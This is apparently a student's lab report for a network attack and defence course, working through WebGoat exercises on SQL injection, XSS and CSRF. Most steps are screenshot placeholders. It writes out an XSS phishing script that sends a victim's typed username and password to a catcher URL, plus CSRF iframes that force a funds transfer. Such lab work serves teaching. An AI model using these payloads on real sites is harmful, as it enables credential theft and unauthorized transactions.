2019-2020-2-《网络对抗技术》-20175332 张苗-exp9 Web安全基础

时间:2020-05-25 17:47:40   收藏:0   阅读:91

目录


1.实践内容

1.1 Web Goat环境搭建

1.查看jdk版本

技术图片

2.安装环境,更改jdk

技术图片

技术图片

技术图片

sudo su
mkdir -p /usr/local/java
cp jdk-8u181-linux-x64.tar.gz /usr/local/java
cd /usr/local/java
tar xzvf jdk-8u181-linux-x64.tar.gz
vim /etc/profile
(添加在profile文件末尾)
JAVA_HOME=/usr/local/java/jdk1.8.0_251
PATH=$PATH:$HOME/bin:$JAVA_HOME/bin
export JAVA_HOME
export PATH
update-alternatives --install "/usr/bin/java" "java" "/usr/local/java/jdk1.8.0_181/bin/java" 1
update-alternatives --install "/usr/bin/javac" "javac" "/usr/local/java/jdk1.8.0_181/bin/javac" 1
update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/local/java/jdk1.8.0_181/bin/javaws" 1
update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/local/java/jdk1.8.0_181/bin/javaws" 1
update-alternatives --set java /usr/local/java/jdk1.8.0_181/bin/java
update-alternatives --set javac /usr/local/java/jdk1.8.0_181/bin/javac
update-alternatives --set javaws /usr/local/java/jdk1.8.0_181/bin/javaws
source /etc/profile

技术图片

技术图片

1.2 SQL注入

命令注入——修改参数,使服务器执行恶意命令

技术图片

技术图片

技术图片

日志欺骗——通过修改日志文件消除攻击痕迹

技术图片

技术图片

数据库后门——利用数据库中的触发器,使用INSERT语句来使系统执行恶意代码

技术图片

技术图片

LAB: SQL Injection——利用SQL语句的特点,注入字符串,使系统执行恶意代码,通过注入字符串绕过认证

技术图片

技术图片

技术图片

数字型盲注入——没有明确返回信息只判断真假的注入,充分利用查询语句实现

技术图片

技术图片

技术图片

技术图片

技术图片

字符串式盲注入——原理与数字相同,字母比较ASCII码的值

技术图片

技术图片

1.3 XSS攻击

钓鱼型:利用XSS,实现钓鱼攻击或向官方页面中增加内容以达到某些目的
</form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);} </script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>

技术图片

存储型:将恶意代码传输至有漏洞的服务器,通过服务器攻击

技术图片

反射型:通过让受害者执行代码获取受害者身份信息以实现伪装并实现某些操作

技术图片

1.4 CSRF攻击

跨站请求伪造:使用户访问一个做过手脚的网站

技术图片

技术图片

绕过CSRF确认:
<iframe src="attack?Screen=319&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=319&menu=900&transferFunds=CONFIRM"> </iframe>

技术图片

技术图片

2.实践问题回答

(1)SQL注入攻击原理,如何防御

(2)XSS攻击的原理,如何防御

(3)CSRF攻击的原理,如何防御

3.实践总结与体会

本次实验操作较为简单,主要是对几种攻击原理的理解,在实验过程中也理解了许多实际生活中某些网站的操作,如进行登陆操作时有许多网站会有输入验证码的操作,这是本学期最后一次实验,回顾一下,个人认为还是较为圆满的完成了每一个实验,在每一个实验中也都学到了许多东西,也体会到了这门课程较高的实践性,也让我在以后的日常生活中使用网络时更为注意。

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2  联系我们:gaon5@hotmail.com
迷上了代码!